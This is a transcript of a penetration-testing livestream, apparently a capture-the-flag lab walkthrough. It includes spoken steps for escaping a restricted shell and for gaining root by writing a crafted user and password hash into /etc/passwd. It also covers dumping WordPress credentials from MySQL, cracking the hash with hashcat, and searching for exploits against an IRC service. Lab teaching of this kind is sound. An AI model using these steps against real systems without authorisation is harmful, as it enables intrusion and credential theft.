editing your script or whatever. It's good for testing, but as, you know, pen testers or hackers, we can use it to do funky stuff that we're not supposed to be able to do. Cool. So that's that. Where are we at here? What Python resources do you recommend? Oh man. It looks like a bunch of people say that's a really broad question. It is a really broad question. The way I learned Python is I did the Code Academy Python levels, and then just enough to get out, just enough to get the syntax down and understand how the language works. And then I just did a bunch of various projects, and, you know, wrote some stuff that I wanted to do. I used it, I did like security DevOps for a little while, so I used it a lot then and kind of learned various tricky ways to do it. I'm not a developer, so I don't have any recommendations to do that, but it's really learn the syntax, do a bunch of projects, and that's how you can learn Python. I'm really bad at Python. I just know how to make things work. I don't write clean code or anything like that. Let's see. Interesting. Vim is awesome. Vim is awesome. That's absolutely true. How old am I? I'm 34. So I'm not as old as I make myself out to be, but I've hired some younger people at work lately, and they make me feel very old. But no, I'm still plenty young. Let's see, self-promotion. Yeah, check out Kaboom's channel. I don't monetize this channel at all. I'm not, you know, against people, you know, also running their own channels. I learn a lot through this channel. I learn probably more than I teach here. So it's, I highly recommend everybody do their channels, because you learn a lot by doing it. So good luck with your channel. Let's see. You can answer with your favorite childhood cartoon. Funny. Yeah, definitely check out Code Academy. It's free. It's awesome. You know, it gets through the basics, but it teaches you the basics, and that's really all you need to know to start. Okay, cool. So we still have stuff to check out. I mean, there's still all, we've only checked out WordPress really. We haven't gone into, I guess there's not a lot else to go into. To-do list. Prevent users from being able to view the web root using local file browser. Too effing late, guy. Cool. I think that might be it. I think we might have enumerated everything. Oh, we haven't checked out the database. So let's do this. Let's get out of this. Let's get out of this funky shell. We're going to SSH in with bash. SH toji at 192.168.47.162 bash 12345. So just to let's do a sudo su. Su of course not. Python c. Yeah, c. Import pty.spawn bin bash, and we'll sudo su 12345, and we're gonna vi etc password. Whoop! Oh my gosh! Whew! Okay, cool. That was fun. So we're going to do this instead. Let me remember the syntax for sed. Sed, search, and replace. IE, okay, cool. Oop. Fine. We'll do this all the way then. We'll 1, 2, 3, 4, 5, and then we'll Python c import pty.spawn bin bash, and we'll get out of here. We will stty raw minus echo fg reset screen. Oop, screen. Cool. And now we'll sudo su 1, 2, 3, 4, 5. We will vi etc password. Ugh. Ugh. No. Okay. Sed IE S, and we're looking for oop, toji. Actually, let's do this. This is dumb. I'm going to show you another thing that we've done on some other stuff. So we'll open SSL, password -1, and we're going to call this foobar, and we got this sweet thing here. We are going to echo rook x 0 0, or actually not 0 0. Let's do 1001, 1001, and not X either. Actually, that's dumb. So what that X field in etc password is, if you're not sure, is that's where the password goes. So we're going to put a password there. What that X means is the password's not here. Sorry, Mario, but your princess is in another channel or castle. And basically, this means that the password is located in Etsy shadow. But if you actually put a password hash here, it'll use that password hash in most Linuxes. So we'll do that. We'll do 1001, 1001. And then we can just do another thing, because this is a comment, so we could be like Rook was here or some shit, but whatever. We'll just put my home directory in / and this will be bin bash. I messed that up. Okay, so we should be able to okay, so now I'm Rook. Cool. And that's all fun. Are we going to be able to SSH as Rook though? 192.168.47. Probably not. I don't think SSH will let you. I don't think SSH will let you pull out of. Etsy password. Oh, it does. Cool. Whatever. Okay, so now we're in. We've got a full bash environment and everything, and I don't have to keep doing that weird rbash escape. So we're going to kill that pain because it was awful. Okay, now we've got this stuff where we're going to cat or vi our vector notes. And if you remember, we had some DB stuff going on. So let's check out the DB. So MySQL is running MySQL. That's weird. I mean, it's not. That's actually good. It's just not something you commonly see. So yeah, if we haven't gotten this stuff before, we got the SSH creds from the deets.txt. We can connect to MySQL locally, and we'll just do MySQL u is admin, and then we'll do a -p like that. Show databases. So we got information schema and WordPress. Information schema is just a bunch of like metadata, so you can check out what databases or tables exist, etc. But since there's only one other database, we don't need to use it. So we'll just use WordPress. Show tables. Here's all the different tables. I mean, if this was a popular WordPress site, we could go into comments and inject malicious content into comments or read comments or whatever we wanted to do. But generally, the thing you're interested in is the WP users. So we'll select star from that. And the only user that's available is this user here. So we could take this and I think John will do something with it. So let's hashes. Just put that in there. And either John or Hashcat will. John the Ripper WordPress hash. That's Hashcat though. Maybe John won't do it. If we do a hash identifier, MD5 WordPress, There's a PHP pass MD5. I don't think it's the same though. You can't use that. So yeah, Hashcat will do it. Is Hashcat installed? Hashcat. We do have Hashcat. Cool. So we can WordPress. It's 400, so it's Hashcat M400. Is it M, right? Yeah, M. And then hashes. And this won't work because I don't have any GPUs or anything, but we can, so my Windows computer, actually, let's do that. Let me just get, I'm doing some stuff on my other screen real quick just to get the hashes into where they need to be, but I'll bring over a PowerShell screen in a second just to show you guys the hashcatting that. It's funny you guys are all like just chomping at the bit to crack the hash for you. We already know what it is. If you remember, this is the database grids, and that is shared with WordPress. So that's what it's going to crack to. I'm just going to show you the procedure for like cracking in Hashcat. Okay, so here's a WordPress, or I'm sorry, not a WordPress. This is my PowerShell. We're going to go into downloads, Hashcat, and I'm going to type hash.txt, and there's our hash there. Cool. So we'll run hashcat. Excuse me, hashcat. Let's see, 64.exe m400 hash.txt. Now, let's see, we can do an example dict, and I bet, actually, that's something we should do. Let's see here. I'm going to open the word lists. I have the crack. Oh God, no, I can't open CrackStation. Here's what I'll do. I will create a new quote unquote word list. Just because this is definitely not in the CrackStation word list or any word list I've ever seen. So we're gonna save this just to like word list 2. Let's save that there. I don't need, Soul Collector asks if I need RockU. I don't need RockU. I have the CrackStation word list on my Windows computer, but I'm almost positive that this password is not in RockU. So I created a new word list, and say it was in RockU, or it was in, actually I have RockU right here, but say it was in RockU, or say it was in the CrackStation word list or whatever. I'm just gonna I'm gonna use word list 2, which I literally just pasted the password in here. So this is going to be super fast. Actually, let's show off my computer a little bit. How do we? Let's do echo. I don't know if this will work. I don't know if this will work in Windows. I'm really bad at Windows. Into RockU. Not even RockU. Let's do wordless. What's the name of that directory? Name of that file? Real human. So if we can type wordless real human And then we should be able to find stir toji star, right? It'll take a minute because this is like a, how big is this file? Oh, it's only 700 megs. It's actually not that big. Surprised that this thing is. Psych, if I'm reading that correctly. This is, none of this is PowerShell. This is literally just a PowerShell window. I don't know why that's taking so long though. This should work. Anyways, we'll do the, yeah. Hashes, line length exception. What? What's the problem here? Hash.txt. M400, yeah? Yeah, M400, literally, I mean, it's like right here. Word list, example hash, M400, oh, do I have to do AO? I forget what AO is. Damn it. A0. Oh, M400. Nope. It's 400, not 0. Still saying it's exception. Oh yeah, I have a GTX 680 as well. I used to have dual 680s. I'm using this as a physics coprocessor now for gaming, and then my wife has my old 680 to drive her. She does art, so it drives like Photoshop and a little bit of World of Warcraft and whatnot. I'm not sure why that's not working. Like, it doesn't like that. So attack mode. Okay. I love how they don't have this. Okay, here, PHP MD5. That's not what we're doing here. WordPress. It is 400. Okay, yeah. So Colin G is asking, where do I source my word list from? Most of the time for CTFs and stuff, RockU is fine. Oftentimes as well, this is fine. Oftentimes the CTF might supply a word list for you. For instance, NetWars, on the NetWars image that you get, the VM image that you get, there's actually two word lists that come on the image. Use those word lists, and that's often good advice for any CTF. If they provide you a word list, use those word lists. Outside of that, I use both the CrackStation word lists a lot. I can, with the top 64 rules from Hashcat, I can crack most stuff. Beyond that, you use targeted word lists. You use tools like Cool or write your own script to like scrape their scrape websites, etc. You know, you scrape their website, build a word list out of that, find out what their favorite book is, and scrape the manuscript of that book and make a word list out of that, etc. That's how you make word lists. But for the most part, CTF stuff like this, Hack the Box, RockU, or CrackStation is going to work just fine. Yes, the WordPress hash is 400, so that's what I got here. It's 400 there. Yeah, the command's good. It's something with the hash itself. I'm not sure why. I mean, it seems fine. If we do this, let's do this. It's not Hashcat. It's because I'm running. I could run into this problem a lot when I'm doing Windows stuff. Oh, I shouldn't have written that to word list. Whoops. Okay, so it's sitting there. There shouldn't be any extra control characters at all. Yeah, it's still... Oh, because I'm not... hashes.txt. What am I doing here? Hash.txt. That's the freaking problem. Oh my goodness. John doesn't actually support this hash type, and John doesn't. Maybe new versions of John support GPU acceleration. I haven't seen it. That's not to say it doesn't exist. I haven't looked into it. I just use Hashcat. The problem was that I was trying to do hashes, which is what I use here, and not hash.txt, which is what the file name is. So if I run this, what is your problem? Ooh. Okay, here we go. So now it's loading it. And so it's building the cache of the thing. It's basically loading that dictionary into memory, and it's running it. Now, I don't actually know if my echo into this was successful, but you can see we're running, let's see, 2 million, yeah, 2,000,000. Oh, so this is million. No, this is 100,000, right? Yeah, 100,000. So this is 2 million hashes per second on device 1, 200,000 thousand hashes, 200,000 hashes on device 2. And it's cruising along. Does it have a time left? Oh, it finished. Wait, it finished? Yeah, I must not have done that right. So if we echo I don't know why this isn't working. That's strange. I failed you. I don't know how to... I don't know why this isn't working. I've failed all of you. We know for a fact that it translates to this because we used it. I don't know what else to say there. Cool. Well, we had done basically everything. Oh wait, were we gonna? Let's try this. Did we? Oops. Help. Oh. So that's interesting that it brings us out here. Is that because that's who ran the command? Yeah, that must be because who ran the command. So if you get into a MySQL shell, you can run this to possibly break out of it to get a bash prompt out of it. And if you see, we exit out of here and we should go back to MySQL. Yeah, and right back into MySQL. So this is another kind of escape mechanism. So either if you're able to connect from outside, like we tried to previously, like when I tried to connect directly from the network and it said I couldn't, we could, if it allowed us to, we could have connected with the credentials we had, then use this to escape, to shell out to a shell, a local shell. Another thing is if you're in an RBash then and you can run MySQL, this is another thing that you can use to kind of escape out of a restricted shell environment. All right, well, I think we found everything. I don't know of any other services. Let's cat the services real quick. TCP scripts. So we used SSH quite a lot, actually. We used the HTTP. We were able to get in through the WordPress, and we were able to get a shell out of the WordPress, get command execution in the WordPress. We were able to use Samba, the SMB, to mount a file system and look through and get some sensitive files in there. We didn't use MySQL much remotely, but once we got a shell, we could connect to it. We could, we could shell out of it if we needed to escape RBash. We used it to dump creds. We didn't do much with IRC. I wonder if there's a vulnerability with this version of IRC, maybe. What is it? Inspire cd.d. Let's do a search exploit. There doesn't seem to be any direct exploits for this one. I'm curious why that was there. I'm curious why that was there. Let's see. Spoof certificate, fingerprints, denial of service. This is an overflow. Wait a minute. So there is exec code here. I'm surprised there's not an exploit for this. How old is this? Surprised there's not an exploit for this. Did we get a version out of this? We didn't get a version. Let's see, 192.168.47.162, 6667. It's Inspire CD 20. 205. 205. I bet this is vulnerable to something. I bet it and I'm gonna wrap this up because we've already been, how long have we been streaming? 2.5 hours. I'm gonna wrap this up, but I bet if we dug into this, like we could probably write like a buffer overflow for something in here. but that's got to be vulnerable to the buffer overflow if we did some more looking. All right, let's sh toji at 192.168.47.162 bash 12345. And we will Python C import pty.spawn then bash. All right, we're root cat proof. Here's some random strings. Seriously? Is there like a freaking puzzle at the end of this? The hell is this? Not found. What? What? What is this? Is it actually random strings, or what's the deal here? This isn't base64. What is this? Huh. Yeah, I'm gonna have to figure this out. I have to get going. I have to pack. So I'm leaving for NolaCon tomorrow, and I haven't packed or anything. But I wanted to get this stream out before. I wanted to get something up before I left for NolaCon. If you're going to be at NolaCon, I look forward to meeting you. If you're not going to be at NolaCon, I'm sorry. But when I get back, we're actually moving. The owners of my house have decided to sell. Yeah. I guess we're going to move, and then after we move, then I'll be making some more videos. So like June 10th-ish should be the next one. And hopefully by then I'll have my process videos up or ready to go. So, you know, the next one in the hacking or the pen test process video will be exploiting. So we'll cover things like launching standalone exploits that found on ExploitDB, using Metasploit to launch, find and launch exploits, modifying exploits, creating standalone exploits from Metasploit modules, you know, converting the Metasploit modules into standalone Python scripts, stuff like that is what it's going to be. The con I'm going to is NolaCon, so it's in New Orleans for the next week, starting tomorrow. Anyways, yeah, the process videos are basically geared towards helping people with the process of doing Hack the Box and PWK and stuff like that. Not so much this where we walk through specific hacks, but more kind of things to think about and different tools that are available and what stuff like that. Anyways, that's it for today. I hope everybody had fun. I know I did. Of course, it went 2.5 hours like they always do. But everybody have a good time, and we'll catch you when I get back.